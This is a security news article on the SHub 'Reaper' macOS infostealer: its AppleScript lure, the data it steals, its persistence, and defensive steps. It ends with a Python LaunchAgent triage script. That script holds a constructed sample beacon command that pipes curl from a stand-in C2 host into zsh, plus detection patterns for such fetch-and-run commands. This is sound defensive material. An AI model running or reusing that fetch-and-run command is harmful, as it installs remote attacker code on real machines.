Reaping the new SHub variant that deceives macOS with applescript and steals credentials

Published · 4 min read

A new variant of the SHub infostealer, dubbed Reaper, shows that attackers keep adapting their techniques to get past macOS security improvements: instead of tricking victims into pasting commands into Terminal, they now use the applescript:// URL scheme to open Script Editor with a malicious AppleScript already loaded. The script displays a fake security update and, if the user clicks "Run", downloads and executes code that installs a backdoor and steals sensitive data.

The sophistication of the attack lies not only in the social engineering (the lures are fake installers for popular applications such as WeChat or Miro, hosted on domains that mimic the legitimate ones) but in the technical chain: the script dynamically builds the command that fetches the payload, hides parts of it under ASCII art, evades analysis by fingerprinting virtual machines and VPNs, and enumerates browser extensions to detect password managers and cryptocurrency wallet extensions before deciding whether to proceed with the infection.


What it steals and how: Reaper prompts for the macOS password to access the Keychain and decrypt credentials, then harvests browser data (Chrome, Firefox, Edge and others), wallet extensions such as MetaMask and Phantom, desktop wallet applications (Exodus, Electrum, Ledger Live, etc.), Telegram sessions, iCloud data, and desktop files and documents that may contain financial information. It also includes a "Filegrabber" that collects selected files within size and volume limits, and a routine that, if it detects wallet clients, terminates the legitimate processes and replaces core files (e.g. app.asar in Electron-based applications) with malicious binaries downloaded from the C2.

To evade protections such as Gatekeeper and macOS warnings, the malware strips quarantine attributes with xattr -cr and applies an ad hoc signature to the modified bundle; it ensures persistence by installing a LaunchAgent that runs regularly (every minute), posing as a legitimate updater and serving as a beacon to receive and execute additional payloads.

The implications are clear: individual users, professionals who handle private keys or credentials, and companies with Macs in their fleet are all targets. The combination of credential theft, file exfiltration and the ability to install remote access tools makes Reaper a platform that can evolve into higher-impact attacks, including draining wallet funds or lateral movement in corporate environments.

For the technical analysis and indicators published by the researchers, read the SentinelOne report on SHub Reaper (SentinelOne: SHub Reaper). For general recommendations on malware hygiene and initial response practices, the CERT/CISA guide provides good guidelines (CISA: Protect your computer against malicious code).


Immediate recommended actions for users: do not click "Run" in Script Editor windows that appear after downloading something from the web; always verify download domains against the vendor's official website; and prefer signed, verifiable packages. If you suspect your Mac has been compromised, disconnect it from the network, make a safe backup, and consider revoking and rotating credentials and keys. Cryptocurrency users should move funds to cold wallets (hardware wallets) and avoid transacting from equipment that may be compromised.

Recommended actions for security administrators and teams: monitor executions of osascript and Script Editor spawned from browsers or downloads; review recent LaunchAgents and entries that mimic legitimate updaters; detect files with stripped quarantine attributes (xattr) or unusual ad hoc signatures; and look for app.asar replacements in wallet applications. Integrate detection rules for atypical outbound traffic to the Telegram API or C2-associated domains, and deploy EDR tools that track zsh/curl process creation that downloads and runs scripts from remote locations.
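The LaunchAgent review suggested above, and the persistence pattern described earlier (a one-minute beacon posing as an updater that fetches and runs remote code), can be triaged automatically from the plist files themselves. The script below is an added example written for this article; it is not SentinelOne's tooling nor code from the report. The finding tags, the 300-second interval threshold, the "system-owned" path prefixes and the three sample plists (including the c2.example.invalid hostname) are all constructed for illustration.

```python
"""Triage macOS LaunchAgent plists for beacon-like persistence.

Flags: a short StartInterval, a command that pipes curl/wget into a shell
or calls osascript, an updater-looking label outside the com.apple.* space,
and a program living in a user-writable location. Added example, not the
report's or the article's own code.
"""
import os
import plistlib
import re
import sys

# Constructed threshold: anything firing this often or faster is beacon-like.
MAX_BENIGN_INTERVAL_SECONDS = 300

# curl/wget piped straight into a shell, or any osascript invocation.
REMOTE_FETCH_AND_RUN = re.compile(
    r"\b(curl|wget)\b[^|]*\|\s*(sh|zsh|bash)\b|\bosascript\b", re.IGNORECASE
)

# Constructed list of prefixes that Apple or package installers normally own.
SYSTEM_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/", "/Applications/")


def parse_launch_agent(raw: bytes) -> dict:
    """Parse a LaunchAgent plist (XML or binary) into a dict."""
    return plistlib.loads(raw)


def program_arguments(agent: dict) -> list:
    """Return argv the agent would run, honouring both Program and ProgramArguments."""
    argv = [str(a) for a in agent.get("ProgramArguments") or []]
    if not argv and "Program" in agent:
        argv = [str(agent["Program"])]
    return argv


def triage_launch_agent(agent: dict) -> list:
    """Return finding tags in a fixed order; an empty list means nothing matched."""
    findings = []
    argv = program_arguments(agent)
    cmd = " ".join(argv)
    label = str(agent.get("Label", ""))

    interval = agent.get("StartInterval")
    if isinstance(interval, int) and 0 < interval <= MAX_BENIGN_INTERVAL_SECONDS:
        findings.append("short_start_interval")
    if REMOTE_FETCH_AND_RUN.search(cmd):
        findings.append("remote_fetch_and_run")
    if re.search(r"updat", label, re.IGNORECASE) and not label.startswith("com.apple."):
        findings.append("updater_like_label")
    # Any absolute path in argv outside system-owned locations is user-writable.
    if any(t.startswith("/") and not t.startswith(SYSTEM_PREFIXES) for t in argv):
        findings.append("user_writable_program")
    return findings


def scan_directory(path: str) -> dict:
    """Map each .plist under `path` to its findings (parse errors become a tag)."""
    results = {}
    for name in sorted(os.listdir(path)):
        if not name.endswith(".plist"):
            continue
        full = os.path.join(path, name)
        try:
            with open(full, "rb") as fh:
                results[name] = triage_launch_agent(parse_launch_agent(fh.read()))
        except Exception:  # malformed plist: still worth a look
            results[name] = ["unparseable_plist"]
    return results


def _plist(label: str, argv: list, interval: int) -> bytes:
    """Build a constructed sample plist for the demonstration below."""
    return plistlib.dumps(
        {"Label": label, "ProgramArguments": argv, "StartInterval": interval, "RunAtLoad": True}
    )


# Constructed samples: a one-minute curl|zsh beacon with an updater label, a
# staged script in the home directory, and a benign hourly job.
BEACON_AGENT = _plist(
    "com.example.softwareupdate",
    ["/bin/zsh", "-c", "curl -fsSL http://c2.example.invalid/update | zsh"],
    60,
)
STAGED_AGENT = _plist(
    "com.example.updater",
    ["/Users/alice/Library/Application Support/.cache/run.sh"],
    60,
)
BENIGN_AGENT = _plist("com.example.backup", ["/usr/bin/true"], 3600)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~/Library/LaunchAgents")
    for sample in (BEACON_AGENT, STAGED_AGENT, BENIGN_AGENT):
        print(triage_launch_agent(parse_launch_agent(sample)))
    if os.path.isdir(target):
        for name, tags in scan_directory(target).items():
            if tags:
                print(f"{name}: {', '.join(tags)}")
```

Run it with no arguments to triage the current user's ~/Library/LaunchAgents, or pass another directory such as /Library/LaunchAgents. The tags are deliberately coarse; a single "short_start_interval" on its own is not evidence of compromise, but the combination of a minute-level interval, a curl-to-shell command and an updater-sounding label is exactly the pattern the report attributes to Reaper and deserves manual review.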

Finally, keep the system up to date, apply restriction policies on browsers and extensions (block unapproved extensions), promote the principle of least privilege (do not use administrator accounts for daily tasks), and educate users about social engineering techniques such as fake updates and "ClickFix"-style prompts. The threat is twofold, technical and human; reducing the attack surface requires both technical controls and changes in user behavior.
